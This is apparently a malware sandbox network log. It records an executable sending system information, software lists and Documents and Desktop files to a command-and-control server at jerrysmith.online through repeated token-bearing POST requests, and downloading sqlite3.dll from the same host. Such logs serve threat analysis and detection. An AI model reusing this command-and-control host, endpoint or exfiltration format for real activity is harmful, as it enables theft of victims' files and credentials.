Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49714	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:25.895426035 CET	1248	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:25.895426989 CET	1249	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:26.039949894 CET	1250	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49715	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:26.096620083 CET	1250	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:26.096662998 CET	1252	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:26.243899107 CET	1252	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49716	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:26.278676033 CET	1253	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:26.278755903 CET	1255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:26.419627905 CET	1255	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49717	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:26.470169067 CET	1256	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:26.470240116 CET	1257	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:26.654256105 CET	1258	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49718	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:26.687133074 CET	1258	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:26.687217951 CET	1260	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:26.859613895 CET	1260	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49719	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:26.905324936 CET	1261	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:26.905324936 CET	1263	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:27.051784039 CET	1263	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49693	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:18.397170067 CET	11	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI Host: jerrysmith.online Content-Length: 15083 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:18.397284985 CET	22	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Mar 22, 2023 11:21:18.424637079 CET	24	OUT	Data Raw: 70 49 44 49 77 4d 54 59 67 4c 53 41 78 4e 69 34 77 4c 6a 51 79 4e 6a 59 75 4d 54 41 77 4d 51 6f 4a 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 39 6d 5a 6d 6c 6a 5a 53 42 50 55 30 30 67 56 56 67 67 54 56 56 4a 49 43 68 46 62 6d 64 73 61 58 4e 6f 4b Data Ascii: pIDIwMTYgLSAxNi4wLjQyNjYuMTAwMQoJTWljcm9zb2Z0IE9mZmljZSBPU00gVVggTVVJIChFbmdsaXNoKSAyMDE2IC0gMTYuMC40MjY2LjEwMDEKCU1pY3Jvc29mdCBPZmZpY2UgU2hhcmVkIFNldHVwIE1ldGFkYXRhIE1VSSAoRW5nbGlzaCkgMjAxNiAtIDE2LjAuNDI2Ni4xMDAxCglNaWNyb3NvZnQgQWNjZXNzIFNldH
Mar 22, 2023 11:21:18.424707890 CET	26	OUT	Data Raw: 57 30 4b 43 56 4a 6c 5a 32 6c 7a 64 48 4a 35 43 67 6c 7a 62 58 4e 7a 4c 6d 56 34 5a 51 6f 4a 59 33 4e 79 63 33 4d 75 5a 58 68 6c 43 67 6c 33 61 57 35 70 62 6d 6c 30 4c 6d 56 34 5a 51 6f 4a 59 33 4e 79 63 33 4d 75 5a 58 68 6c 43 67 6c 33 61 57 35 Data Ascii: W0KCVJlZ2lzdHJ5CglzbXNzLmV4ZQoJY3Nyc3MuZXhlCgl3aW5pbml0LmV4ZQoJY3Nyc3MuZXhlCgl3aW5sb2dvbi5leGUKCXNlcnZpY2VzLmV4ZQoJbHNhc3MuZXhlCglmb250ZHJ2aG9zdC5leGUKCWZvbnRkcnZob3N0LmV4ZQoJc3ZjaG9zdC5leGUKCXN2Y2hvc3QuZXhlCglzdmNob3N0LmV4ZQoJc3ZjaG9zdC5leGUK
Mar 22, 2023 11:21:18.577368975 CET	26	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49720	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:27.096477032 CET	1264	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:27.096529961 CET	1265	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:27.243411064 CET	1266	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49721	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:27.284539938 CET	1266	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:27.284693003 CET	1268	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:27.471998930 CET	1269	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49722	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:27.510185003 CET	1269	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:27.510253906 CET	1271	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:27.657152891 CET	1271	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49723	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:27.693178892 CET	1272	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:27.693224907 CET	1274	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:27.832185030 CET	1274	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49724	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:27.873126984 CET	1274	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:27.873178005 CET	1276	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:28.016093969 CET	1277	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49725	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:28.058835030 CET	1277	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:28.058890104 CET	1279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:28.234536886 CET	1279	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49726	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:28.332755089 CET	1280	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:28.332834005 CET	1282	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:28.472125053 CET	1282	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49727	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:28.525671959 CET	1283	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:28.525724888 CET	1284	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:28.671166897 CET	1285	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49728	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:28.727281094 CET	1285	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:28.727344990 CET	1287	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:28.875953913 CET	1287	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49729	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:28.921601057 CET	1288	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:28.921655893 CET	1290	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:29.065377951 CET	1290	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49694	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:18.660377979 CET	27	OUT	GET /c043bcd0ba06ae1d/sqlite3.dll HTTP/1.1 Host: jerrysmith.online Cache-Control: no-cache
Mar 22, 2023 11:21:18.779143095 CET	28	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Connection: close Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 